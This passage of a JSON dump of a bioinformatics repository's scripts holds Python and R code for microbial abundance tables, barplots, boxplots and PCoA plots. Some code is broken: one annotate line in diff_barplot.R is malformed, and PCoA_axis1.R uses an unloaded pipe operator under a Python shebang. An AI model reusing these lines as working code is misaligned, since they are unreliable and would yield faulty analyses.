round(geneNumber/totalGene,2)\n\tout.write('\\t'.join([threshold,str(sampleNumber),str(geneNumber),str(geneRate)]) + '\\n')\nout.close()\n\n### plot ###\nimport seaborn as sns\nimport matplotlib.pyplot as plt\ndt = pd.read_table(outdir + '/geneInsample.txt', sep='\\t', header=0)\nsns.set_style(\"ticks\")\np = sns.barplot(x=dt[\"sampleNumber\"],y=dt[\"geneNumber\"])\np.axes.set_title(\"geneINsample\", size=14)\np.set_xlabel(\"sample numbers(>=)\", size=12)\np.set_ylabel(\"gene numbers\", size=12)\np.tick_params(labelsize=10)\nfig = p.get_figure()\nfig.savefig(outdir+ \"geneINsample.pdf\")\n\n#print out the genes exist more than in 10% samples\n'''\nsampleOfTen = int(totalsample*0.1)\ngeneOfTen = sampleNum[sampleNum >= sampleOfTen]\nwith open('GeneOfTen.txt','w') as gene:\n\tgeneOfTen.to_csv(gene, sep='\\t')\ngeneprofile_10 = df[sampleNum >= sampleOfTen]\nwith open('geneprofile_10','w') as profile:\n geneprofile_10.to_csv(profile, sep='\\t')\n'''\n"
},
{
"alpha_fraction": 0.5860335230827332,
"alphanum_fraction": 0.5932961106300354,
"avg_line_length": 35.448978424072266,
"blob_id": "fecc237d514c5e4b2741c604449aae6a157e894e",
"content_id": "3a339b68290b6f986fad23e754c35104e63152d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2190,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 49,
"path": "/16S/barplot_generate.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n###############################\n#根据丰度表或者其他进行归一化,然后提取指定的一组物种或者 OTU, 并且生成带有分组信息的 barplot.txt 用于绘制 barplot, 最后生成物种或者 OTU 的排序; \n#时间关系,就不写成加外参的形式了,需要的文件在 Data 文件夹下边;\n#关键词:归一;排序;\n###############################\nimport pandas as pd\n#转化为相对丰度,并且提取需要的 OTU 的丰度\ndt = pd.read_table('OTU_table_for_biom.txt', header = 1, index_col = 0)\ndt = dt.iloc[:,:-1] #筛选列\ndt = dt.div(dt.sum(axis=0), axis=1) # 这一招绝了...佩服以前的自己\n\n\nwith open('otu_id.txt', 'r') as IN:\n otu_list= IN.read().split('\\n')\n otu_list.remove('')\ndf = dt.loc[otu_list]\ndf.to_csv('filter_OTU_table.txt', sep = \"\\t\")\n\n# 提取样品分组信息\ngroup_dict = dict()\ngroup_dt = pd.read_table('bms.info', index_col = 0)\n#group_dt.head()\nfor item in group_dt.index:\n group_dict[item] = group_dt.loc[item]['Description']\n \n#生成画 barplot 的图,四列,没有考虑合并低丰度的问题,也没过滤某个样本所有 OTU 都为零的情况;\nfrom collections import defaultdict\nwith open('filter_OTU_table.txt', \"r\") as IN, open('barplot.txt', \"w\") as out:\n out.write('individual\\ttax\\tabundance\\tgroup\\n')\n head = IN.readline().strip('\\n').split('\\t')\n Dict = defaultdict(float)\n for line in IN:\n lst = line.strip('\\n').split('\\t')\n taxonomy = lst[0]\n for index in range(1,len(lst)):\n key = head[index] + \"\\t\" + taxonomy + \"\\t\" + lst[index]\n Dict[key] = head[index]\n for key in Dict:\n keys = key.split('\\t')\n indiv = keys[0]\n taxonomy = keys[1]\n abund = keys[2]\n out.write(indiv + '\\t' + taxonomy + '\\t' + abund + '\\t' + group_dict[indiv] + '\\n') \n\n#tax_order 图例的顺序,这里是 OTU 的顺序,按照全部样品中的 OTU 的均值排列 \ndt = pd.read_table('barplot.txt', index_col=0)\ntax_order = list(dt.groupby('tax').abundance.mean().sort_values(ascending=False).index)\ntax_order = ','.join(['\"' + x + '\"' for x in tax_order]) \n"
},
{
"alpha_fraction": 0.565315306186676,
"alphanum_fraction": 0.5720720887184143,
"avg_line_length": 25.117647171020508,
"blob_id": "3cac0bf51d83723e5e547d5a78f07f88034b134b",
"content_id": "673860f741c6e5c33cfb85bb543da4c4c053f156",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 482,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 17,
"path": "/qsub/qstat_monitor.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 根据 qsub 的 jobID 进行定时的获取内存的监控,待完善\n#! /usr/bin/python3\nimport sys,os\nfrom datetime import datetime\nimport time\njobID = sys.argv[1]\ntime_sleep = int(sys.argv[2])\ndef timer(n):\n while True:\n print(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n vf = os.popen('qstat -j ' + jobID + '| grep usage').readline().strip('\\n')\n if vf:\n print(vf)\n else:\n exit()\n time.sleep(n)\ntimer(time_sleep)\n"
},
{
"alpha_fraction": 0.6170411705970764,
"alphanum_fraction": 0.6276529431343079,
"avg_line_length": 45.434783935546875,
"blob_id": "c4bc9df424e1ac26ad0c03833412be71fe82cc09",
"content_id": "54a86439320ea90a67286214e7f1c83a4000edfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3216,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 69,
"path": "/rat/diff/boxplot.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3 \nimport argparse,re,numpy,os\nimport pandas as pd\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\ngenerate the boxplot based on different test.\nExample: python3 barplot.py -i phylumProfileTable.xls -o Process -r 0.01\nTo be continued.\n------------------'''\n)\nparser.add_argument('-a','--abd', help = \"the abundance file, eg M_expose_genusProfileTable.xls.\")\nparser.add_argument('-g','--group', help = \"the group name,eg EL:Cig.\")\nparser.add_argument('-c','--color', help = \"the color scheme,eg 487eb3:d2382c.\")\nparser.add_argument('-d','--diff', help = \"the filtered different test result file, eg filter_EL_Cig.E-liquid-Cigarette.wilcox.test.xls.\")\nparser.add_argument('-n','--number', help = \"the number of tax for boxplot,eg 20. default is 20.\", type=int, nargs='?')\nparser.add_argument('-f','--filter_type', help = \"the filter type of different result,eg pvalue. default is qavlue\", nargs='?')\nparser.add_argument('-p','--prefix', help = \"the prefix for output,eg genus.\")\nparser.add_argument('-o','--outdir', help = \"the output directory\")\nargs=parser.parse_args()\n(abd_file,group,color,diff_result,prefix,outdir) = (args.abd,args.group,args.color,args.diff,args.prefix,args.outdir)\npar = [abd_file,group,color,diff_result,prefix,outdir]\nif not all(par):\n\tparser.print_help()\n\texit()\n\ntax_number = args.number if args.number else 20\nfilter_type = args.filter_type if args.filter_type else 'qvalue'\n\nos.chdir(outdir)\ngroup_list = group.split(':')\nwith open(abd_file, 'r') as abd, open('tax_mean_order.txt','w') as out:\n out.write('Tax\\tMean\\n')\n head = abd.readline().strip('\\n').split('\\t')\n for line in abd:\n line = line.strip('\\n').split('\\t')\n control_list = list()\n case_list = list()\n for index in range(1,len(line)):\n if re.match('EL',head[index]):\n control_list.append(float(line[index]))\n else:\n case_list.append(float(line[index]))\n out.write(line[0] + '\\t' + str(numpy.mean(control_list)) + '\\n')\n out.write(line[0] + '\\t' + str(numpy.mean(case_list)) + '\\n')\n \nmean_order = pd.read_table('tax_mean_order.txt', header=0, index_col=0)\nplot_tax = numpy.unique(mean_order.sort_values(by = 'Mean', ascending=False)[:tax_number*2].index)[:tax_number]\n\nwith open(abd_file, 'r') as abd, open('boxplot.txt', 'w') as out:\n print('ID\\tAbd\\tGroup', file=out)\n head = abd.readline().strip('\\n').split('\\t')\n for line in abd:\n line = line.strip('\\n').split('\\t')\n if line[0] in plot_tax:\n for index in range(1,len(line)):\n if re.match(group_list[0],head[index]):\n print(line[0] + '\\t'+ line[index] + '\\t' + group_list[0], file=out)\n else:\n print(line[0] + '\\t'+ line[index] + '\\t' + group_list[1], file=out)\n\nrscript = 'Rscript /ifshk7/BC_PS/wangpeng7/Script/diff/boxplot.R boxplot.txt ' + group + ' ' + color + ' ' + diff_result + ' ' + filter_type + ' ' + prefix\nprint(rscript)\nos.system(rscript)\n# 删除过程文件\n#os.remove('boxplot.txt')\n#os.remove('tax_mean_order.txt')\n"
},
{
"alpha_fraction": 0.5637003183364868,
"alphanum_fraction": 0.5861509442329407,
"avg_line_length": 47.01298522949219,
"blob_id": "18bb15808fc8727fed3a6055532748bfa3b1d606",
"content_id": "e44df4aef95d9368a5df7c4cd0df4a702d37e094",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 3943,
"license_type": "no_license",
"max_line_length": 248,
"num_lines": 77,
"path": "/diff_barplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#根据输入文件,三列,分别是 Group Profile Disease,组别(case&control),数据,疾病组别,画柱状图,并且标显著性差异,小于 0.01 为 ** ,小于 0.05 为 *;\n# 有问题请发邮件 [email protected] ~\n\nlibrary(\"hash\")\nlibrary(\"ggplot2\")\ndata <- read.table('Y_temp',header=T,sep=\"\\t\")\ndata$Group <- factor(data$Group, levels=c(\"Control\",\"Case\"))\ndata$Disease <- factor(data$Disease, levels=c(\"AS\",\"RA\",\"Gout\"))\ncolor = c('#00BFC4','#F8766D')\nplot = ggplot(data, aes(x=Disease, y=Profile, fill=Group)) +\n geom_bar(position=position_dodge(), stat=\"identity\") +\n #labs(y=\"Relative abundance (x 1e-5)\",x=\"Disease\",fill=\"\",color=\"\", title=title) +\n scale_fill_manual(values = color) + \n theme(axis.text.x = element_text(colour=\"black\",size=10),\n axis.text.y = element_text(colour=\"black\",size=10),\n axis.line = element_line(color=\"black\",size=0.5),\n axis.ticks = element_line(color=\"black\",size=0.5),\n axis.title = element_text(color=\"black\",size=10),\n plot.title = element_text(color=\"black\",size=10),\n legend.position=\"none\",\n panel.background = element_blank()\n )\n\n#标显著性差异,根据 P 值大小,< 0.01 两个 * ,< 0.05 但是 > 0.01 一个 * ; \ngroup = c(\"AS\",\"RA\",\"Gout\") # 顺序需要和 X 轴一致\ndiff_x = c()\ndiff_sig_x = c()\n#pvalue = hash()\nfor ( i in 1:length(group)){\n subset = data[data$Disease == group[i],]\n p_value = wilcox.test(subset[subset$Group == 'Case',]$Profile, subset[subset$Group == 'Control',]$Profile,)$p.value \n# .set(pvalue, keys = group[i], values = p_value ) # R 的哈希,记录一下,虽然没有用到\n if (p_value < 0.01){\n diff_sig_x = c(diff_sig_x, i)\n }\n else if (p_value < 0.05) {\n diff_x = c(diff_x, i)\n }\n else {\n next\n }\n }\n\n#输出 注释掉的行用于外接参数和输出文件的情况 \n#png\nlabel_y = max(data$Profile)*1.1\nif (is.null(diff_x) & is.null(diff_sig_x)) {\n print(\"no item is different! check your data!\")\n} else if ( !is.null(diff_x) & is.null(diff_sig_x)) {\n #png(paste(filename_prefix,\"_barplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\") #集群\n #png(paste(filename_prefix,\"_barplot.png\",sep=\"\"), units=\"in\",res=600, width=6, height=4, bg=\"transparent\")\n plot + annotate('text', x = diff_x, y = label_y, label='*', size = 5)\n} else if ( is.null(diff_x) & !is.null(diff_sig_x)) {\n #png(paste(filename_prefix,\"_barplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\")\n plot + annotate('text', x = diff_sig_x, y = label_y, label='**', size = 5)\n} else {\n #png(paste(filename_prefix,\"_barplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\")\n plot + annotate('text', x = diff_x, y = label_y, label='*', size = 5) + annotate('text', x = diff_sig_x, y = plot + annotate('text', x = diff_x, y = label_y, label='*', size = 5) + annotate('text', x = label_y, y = -2, label='**', size = 5)\n, label='**', size = 5)\n}\n#dev.off()\n\n#eps\nif (is.null(diff_x) & is.null(diff_sig_x)) {\n #print(\"no item is different! check your data!\")\n} else if ( !is.null(diff_x) & is.null(diff_sig_x)) {\n\t#postscript(paste(filename_prefix,\"_barplot.eps\",sep=\"\"), width = 6, height=4)\n plot + annotate('text', x = diff_x, y = label_y, label='*', size = 5)\t\n} else if ( is.null(diff_x) & !is.null(diff_sig_x)) {\n \n\t#postscript(paste(filename_prefix,\"_barplot.eps\",sep=\"\"), width = 6, height=4)\n plot + annotate('text', x = diff_sig_x, y = label_y, label='**', size = 5)\n} else {\n\t#postscript(paste(filename_prefix,\"_barplot.eps\",sep=\"\"), width = 6, height=4)\n plot + annotate('text', x = diff_x, y = label_y, label='*', size = 5) + annotate('text', x = diff_sig_x, y = label_y, label='**', size = 5)\n}\n#dev.off()\n"
},
{
"alpha_fraction": 0.5944041609764099,
"alphanum_fraction": 0.6199678182601929,
"avg_line_length": 42.20000076293945,
"blob_id": "dad3a06e0e044716b02bb0b1844776fd9493151f",
"content_id": "66a55b175d5e8efbfa4f1a96abbdb86ed47b6e14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 5090,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 115,
"path": "/rat/diff/boxplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/Rscript \n\nlibrary(ggplot2)\nlibrary(dplyr)\nArgs = commandArgs(TRUE)\nbox_table = Args[1] # boxplot.txt\ngroup_list = Args[2] # EL:Cig\ncolor_list = Args[3] # 487eb3:d2382c\ndiff_result = Args[4] # EL_Cig.E-liquid-Cigarette.wilcox.test.xls\ndiff_type = Args[5] # pvalue or qvalue\nprefix = Args[6]\nlegend_list = c(unlist(strsplit(group_list, \":\")))\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\nfilename_prefix = paste(prefix,gsub(\":\", \"_\", group_list),sep=\"_\")\n\ndata = read.table(box_table, header = T, sep = '\\t')\n\n# 确定横坐标轴的物种顺序,cig 相当于分组 2 和分组 1,暂时不改动代码\ncig_dt = filter(data, Group == legend_list[2])\ncig_group = group_by(cig_dt, ID)\ncig_summ = summarise(cig_group, cig_median = median(Abd))\nel_dt = filter(data, Group == legend_list[1])\nel_group = group_by(el_dt, ID)\nel_summ = summarise(el_group, el_median = median(Abd))\nmerge = merge(cig_summ, el_summ, by='ID')\nbigger = filter(merge, merge$cig_median > merge$el_median)\nless = filter(merge, merge$cig_median < merge$el_median)\n#x_order = as.character(rbind(bigger[order(bigger$cig_median),]['ID'], less[order(less$cig_median),]['ID'])$ID)\nx_order = c(as.character(rev(bigger[order(bigger$cig_median),]$ID)), as.character(rev(less[order(less$cig_median),]$ID)))\ndata$x = factor(data$ID, levels=x_order)\n\ndata$group<-factor(data$Group, legend_list)\nplot = ggplot(data,aes(x = x, y = log10(Abd))) +\ngeom_boxplot(aes(color = factor(group)), fatten = 1, lwd = 0.5, outlier.size = 0.5, position = position_dodge(0.9)) +\nlabs(x ='', y = expression(Relative~abundance~(log['10'])), fill = '', color = '', size = 10 ) +\nscale_color_manual(values = color_var) +\ntheme(\n\taxis.text = element_text(colour = 'black', size = 10),\n\taxis.text.x = element_text(hjust = 1, angle = 45), #phylum\n#\taxis.text.x = element_text(hjust = 1, face = 'italic', angle = 45), #genus\n#\taxis.text.x = element_text(hjust = 1, face = 'italic', angle = 60), #species\n\taxis.title.y = element_text(size = 10, face = 'bold'),\n\taxis.line = element_line(size=0.5, colour = \"black\"),\n\tlegend.position = c(0,0),\n\tlegend.justification = c(0,0),\n\tlegend.key = element_blank(),\n\tlegend.text = element_text(size = 10),\n\tlegend.key.width = unit(0.2, 'in'),\n\tlegend.key.height = unit(0.2, 'in'),\n\tlegend.background = element_blank(),\n\tpanel.background = element_blank(),\n\tplot.margin = unit(c(0.2, 0.2, 0.1, 0.2), 'in')\n)\n\n# 加差异显著的 * 或者 **, 目前只支持 0.05 和 0.01 \ndf = read.table(diff_result, header=T, sep=\"\\t\", check.names = F)\ndiffID_sig = filter(df, UQ(as.name(diff_type)) < 0.01)$ID # UQ .. 这个将字符串改变为内置变量\ndiffID = filter(df, UQ(as.name(diff_type)) > 0.01 & UQ(as.name(diff_type)) < 0.05)$ID\ndiff_x = c()\nif ( length(diffID) == 0 & length(diffID_sig) == 0) {\n\tprint(paste(\"no tax is different for\",diff_type,\"!\",sep=\" \"))\n\tq()\n}\nfor (i in 1:length(diffID)) {\n\titem = gsub('_',' ', diffID[i]) # 因为 ID 不统一\t\n if ( item %in% x_order) {\n diff_x = c(diff_x,(which(x_order == item)))\n\t\t\tprint(item) \n }\n}\n\ndiff_sig_x = c()\nif (length(diffID_sig != 0)) {\n\tfor (i in 1:length(diffID_sig)) {\n\t\titem = gsub('_',' ', diffID_sig[i])\t\n \t\tif ( item %in% x_order) {\n diff_sig_x = c(diff_sig_x,(which(x_order == item))) \n\t\t\tprint(item) \n \t\t}\n\t}\n} \n# eps\nif (is.null(diff_x) & is.null(diff_sig_x)) {\n print(\"no tax is different! check your data!\")\n\tq()\n} else if ( !is.null(diff_x) & is.null(diff_sig_x)) {\n\tpostscript(paste(filename_prefix,\"_boxplot.eps\",sep=\"\"), width = 6, height=4)\n plot + annotate('text', x = diff_x, y = -2, label='*', size = 5)\t\n} else if ( is.null(diff_x) & !is.null(diff_sig_x)) {\n \n\tpostscript(paste(filename_prefix,\"_boxplot.eps\",sep=\"\"), width = 6, height=4)\n plot + annotate('text', x = diff_sig_x, y = -2, label='**', size = 5)\n} else {\n\tpostscript(paste(filename_prefix,\"_boxplot.eps\",sep=\"\"), width = 6, height=4)\n plot + annotate('text', x = diff_x, y = -2, label='*', size = 5) + annotate('text', x = diff_sig_x, y = -2, label='**', size = 5)\n}\ndev.off()\n\n#png\nif (is.null(diff_x) & is.null(diff_sig_x)) {\n print(\"no tax is different! check your data!\")\n\tq()\n} else if ( !is.null(diff_x) & is.null(diff_sig_x)) {\n png(paste(filename_prefix,\"_boxplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\") #集群\n # png(paste(filename_prefix,\"_boxplot.png\",sep=\"\"), units=\"in\",res=600, width=6, height=4, bg=\"transparent\")\n plot + annotate('text', x = diff_x, y = -2, label='*', size = 5)\n} else if ( is.null(diff_x) & !is.null(diff_sig_x)) {\n png(paste(filename_prefix,\"_boxplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\")\n plot + annotate('text', x = diff_sig_x, y = -2, label='**', size = 5)\n} else {\n png(paste(filename_prefix,\"_boxplot.png\",sep=\"\"),type=\"cairo\",units=\"in\",res=600,width=6,height=4,bg=\"transparent\")\n plot + annotate('text', x = diff_x, y = -2, label='*', size = 5) + annotate('text', x = diff_sig_x, y = -2, label='**', size = 5)\n}\ndev.off()\n"
},
{
"alpha_fraction": 0.6904761791229248,
"alphanum_fraction": 0.6984127163887024,
"avg_line_length": 44.818180084228516,
"blob_id": "f0b6522d6bd6eab2ca6d8be39695bf2df22a112c",
"content_id": "331b24d9a5cbe701c80cb594521cffe1c06931dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 550,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 11,
"path": "/rat/beta/process.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n#根据分组名字,合并组间组内的距离文件,并且运行 anova.R\nimport os,sys\nparent_dierctory = sys.argv[1]\ntitle = sys.argv[2] #\nitems = ['Fexpose','Frecovery','Mexpose','Mrecovery']\nfor directory in items:\n\tos.chdir(parent_dierctory + '/' + directory)\n\tos.system('python3 merge.py')\n\tos.system('Rscript anova.R intra_group.txt ' + directory +'_intra ' + title + ' ACK:EL:Cig distance group')\n\tos.system('Rscript anova.R inter_group.txt ' + directory +'_inter ' + title + ' ACK-Cig:ACK-EL:El-Cig distance group')\n"
},
{
"alpha_fraction": 0.6571428775787354,
"alphanum_fraction": 0.6571428775787354,
"avg_line_length": 13,
"blob_id": "f3fd856b1d65a566cbc55ef1fa446bc41923e797",
"content_id": "5f1e88572dd955ff1bf5073d4196eb1aa1ff6e28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 82,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 5,
"path": "/rat/beta/scp.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 传输文件到 Mac 端\nfor x in `ls */*pdf`\ndo\n\texpect scp.expect $x beta\ndone\n"
},
{
"alpha_fraction": 0.5986678004264832,
"alphanum_fraction": 0.6269775032997131,
"avg_line_length": 42.672725677490234,
"blob_id": "c277ec4f5296799aa8d211d3b976190eb8b62d7d",
"content_id": "9ea8d3ccec7268763bb9660fbd6f6c84ce91a6c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2624,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 55,
"path": "/PCoA_axis1.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#重现看到的一篇文章的 PCoA 图,可以看干预前后主坐标 1 的变化趋势,还是挺有意思的,输入文件(需要提前处理成一样的格式)在 Data 目录下;\n#文章:Links between environment, diet, and the hunter-gatherer microbiome;\n# 这是初始版本,接外参,加颜色什么的后边再完善吧..\n\nlibrary(\"ggplot2\")\nlibrary(\"vegan\")\nlibrary(\"ape\")\ndt = read.table('F_phylumProfileTable_PCoA.xls', header = T, row.names=1, sep = \"\\t\", check.name = F)\ngroup = dt %>% select(c('Time','SubjectID'))\ngroup$SampleID = rownames(group)\ndf = dt %>% select(-c('Time','SubjectID'))\nbeta.dis <- vegdist(df, method = \"bray\")\nPCOA <- pcoa(beta.dis, correction=\"none\", rn=NULL)\nresult <- PCOA$values[,\"Relative_eig\"]\npco1 <- as.numeric(sprintf(\"%0.3f\",result[1]))*100\npco2 <- as.numeric(sprintf(\"%0.3f\",result[2]))*100\nxlab=paste(\"PCoA1(\",pco1,\"%)\",sep=\"\")\nylab=paste(\"PCoA2(\",pco2,\"%)\",sep=\"\")\n\npc <- as.data.frame(PCOA$vectors)\naxis = pc %>% select(Axis.1, Axis.2)\naxis$SampleID = rownames(axis)\nplot_dt = merge(axis, group, by='SampleID')\n\n# 生成干预前后带有连线的 PCoA 图\nggplot(plot_dt, aes(Axis.1,Axis.2,group = SubjectID)) + geom_line(color = 'grey') + geom_point(size=3,aes(color=Time)) +\n geom_hline(yintercept=0,linetype=4,color=\"grey\") +\n geom_vline(xintercept=0,linetype=4,color=\"grey\") +\n labs(x=xlab,y=ylab) +\n theme_bw() +\n theme(axis.text = element_text(colour = 'black', size = 10), \n axis.title = element_text(size = 12),\n panel.background = element_rect(colour = \"black\", size = 1),\n #panel.grid =element_blank(), \n legend.key = element_blank(),\n legend.text = element_text(size = 10), \n #legend.title = element_blank(), legend.position='none', \n plot.margin = unit(c(0.4, 0.3, 0.1, 0.1 ), 'in'))\n\n\n#生成主坐标 1 的干预前后变化图\nggplot(plot_dt, aes(Axis.1, SubjectID, group = SubjectID)) + geom_line(color = 'grey') + geom_point(size=3,aes(color=Time)) +\n geom_hline(yintercept=0,linetype=4,color=\"grey\") +\n geom_vline(xintercept=0,linetype=4,color=\"grey\") +\n #labs(x=xlab) +\n theme_bw() +\n theme(axis.text = element_text(colour = 'black', size = 10), \n axis.title = element_text(size = 12),\n panel.background = element_rect(colour = \"black\", size = 1),\n #panel.grid =element_blank(), \n legend.key = element_blank(),\n legend.text = element_text(size = 10), \n #legend.title = element_blank(), legend.position='none', \n plot.margin = unit(c(0.4, 0.3, 0.1, 0.1 ), 'in'))\n"
},
{
"alpha_fraction": 0.5646067261695862,
"alphanum_fraction": 0.5717852711677551,
"avg_line_length": 39.55696105957031,
"blob_id": "1d2c28b2e751829549e8317c9ebdac85834cc33c",
"content_id": "7c6599688b8a1b626db7889555691ad969dde2dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3268,
"license_type": "no_license",
"max_line_length": 218,
"num_lines": 79,
"path": "/MetaPhlAn2/profileGenerate.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#基于 MetaPhlan2 合并后的文件输出不同水平的丰度表, 目前只有三个水平,门,属,种\n#! /usr/bin/env python3\nimport argparse,re\nparser = argparse.ArgumentParser(description = \"get the abundance file of some level of microbes from MetaPhlAn2_Merge_abundance_table ... To be continued!\")\nparser.add_argument('-i','--Input', help = \"the input file\")\nparser.add_argument('-o','--Output', help = \"the output directory\")\nparser.add_argument('-l','--level', help = \"the level of species,separated by a comma,like: phylum,genus,species\")\nargs=parser.parse_args()\n(Input,Output,level) = (args.Input,args.Output,args.level)\nif not Input or not Output or not level:\n print(\"Plase add the parameters,thank you :)\\n\\nExample: python3 genus_abundance.py -i MetaPhlAn2_Analysis/MetaPhlAn2_Merge_abundance_table.xls -l phylum,genus,species -o Taxonomy_MetaPhlAn2/MetaPhlAn2_Analysis\\n\")\n exit()\n\nlevel_list = list()\nif re.search(\",\",level):\n\tlevel_list = level.split(\",\")\nelse:\n\tlevel_list = level\n\n#=======genus=====\nif \"genus\" in level_list:\n\tprint(\"producing the genus abundance file\")\n\twith open(Input,'r') as IN, open (Output + \"genusProfileTable.xls\",'w') as out:\n\t\tIN.readline()\n\t\thead = IN.readline()\n\t\tout.write(head)\n\t\tfor line in IN:\n\t\t\t\tif len(line.strip('\\n').split('\\t')[0].split('|')) == 6:\n\t\t\t\t\tgenus = line.strip('\\n').split('\\t')[0].split('|')[-1]\n\t\t\t\t\tlst = line.strip('\\n').split('\\t')\n\t\t\t\t\tout.write(genus)\n\t\t\t\t\tfor index in range(1,len(lst)):\n\t\t\t\t\t\tout.write('\\t' + lst[index])\n\t\t\t\t\tout.write('\\n')\n\t\t\t\telse:\n\t\t\t\t\tcontinue;\n\tprint(\"producing the genus abundance file is done!\")\nelse:\n\tprint(\"not genus here!\")\n#=======phylum=====\nif \"phylum\" in level_list:\n print(\"producing the phylum abundance file\")\n with open(Input,'r') as IN,open (Output + \"phylumProfileTable.xls\",'w') as out:\n IN.readline()\n head = IN.readline()\n out.write(head)\n for line in IN:\n if len(line.strip('\\n').split('\\t')[0].split('|')) == 2:\n phylum = line.strip('\\n').split('\\t')[0].split('|')[-1]\n lst = line.strip('\\n').split('\\t')\n out.write(phylum)\n for index in range(1,len(lst)):\n out.write('\\t' + lst[index])\n out.write('\\n')\n else:\n continue;\n print(\"producing the phylum abundance file is done!\")\nelse:\n\tprint(\"not phylum here!\")\n#=======species=====\nif \"species\" in level_list:\n print(\"producing the species abundance file\")\n with open(Input,'r') as IN,open (Output + \"speciesProfileTable.xls\",'w') as out:\n IN.readline()\n head = IN.readline()\n out.write(head)\n for line in IN:\n if len(line.strip('\\n').split('\\t')[0].split('|')) == 7:\n species = line.strip('\\n').split('\\t')[0].split('|')[-1]\n lst = line.strip('\\n').split('\\t')\n out.write(species)\n for index in range(1,len(lst)):\n out.write('\\t' + lst[index])\n out.write('\\n')\n else:\n continue;\n print(\"producing the species abundance file is done!\")\nelse:\n\tprint(\"not species here!\")\n"
},
{
"alpha_fraction": 0.6152832508087158,
"alphanum_fraction": 0.6205533742904663,
"avg_line_length": 20.685714721679688,
"blob_id": "4172862f64e7d5384b2a3a002c7bc642de084e75",
"content_id": "16693b0ce0ab0bb9a291620dfe15618d16fb2a3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 773,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 35,
"path": "/16S/otu_fasta.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n# 根据 OTU ID 提取 fasta 序列, eg: python3 otu_fasta.py ../Temp/otuID ../Temp/otu_demo.fasta \nimport os,sys\n## write the fasta file into directory\notu_ID = sys.argv[1]\ninputFile = sys.argv[2]\nbasename = os.path.basename(inputFile)\noutFile = 'filter_' + basename\nfasta_dict = dict()\nwith open (inputFile, 'r') as IN:\n\tseq = ''\n\tkey = ''\n\tfor line in IN:\n\t\tif line.startswith('>'):\n\t\t\tfasta_dict[key] = seq\n\t\t\tkey = line\n\t\t\tseq = ''\n\t\telse:\n\t\t\tseq = seq + line\n\n\tfasta_dict[key] = seq\n\ndel fasta_dict['']\n\n#process otu ID file\nwith open(otu_ID, 'r') as IN, open(outFile, 'w') as out:\n\tfor line in IN:\n\t\tID = '>' + line\n\t\tif ID in fasta_dict:\n\t\t\tout.write(ID + fasta_dict[ID])\n\n'''\nfor key in fasta_dict:\n\tprint (key + '==>' + fasta_dict[key])\n'''\n"
},
{
"alpha_fraction": 0.6230414509773254,
"alphanum_fraction": 0.6488479375839233,
"avg_line_length": 44.20833206176758,
"blob_id": "dc33f5635c3a318d9ab1b12d4c9dfba8ba60b059",
"content_id": "833db6b2261dd90256910a5fc060a2e542b32cfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1115,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 24,
"path": "/boxplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
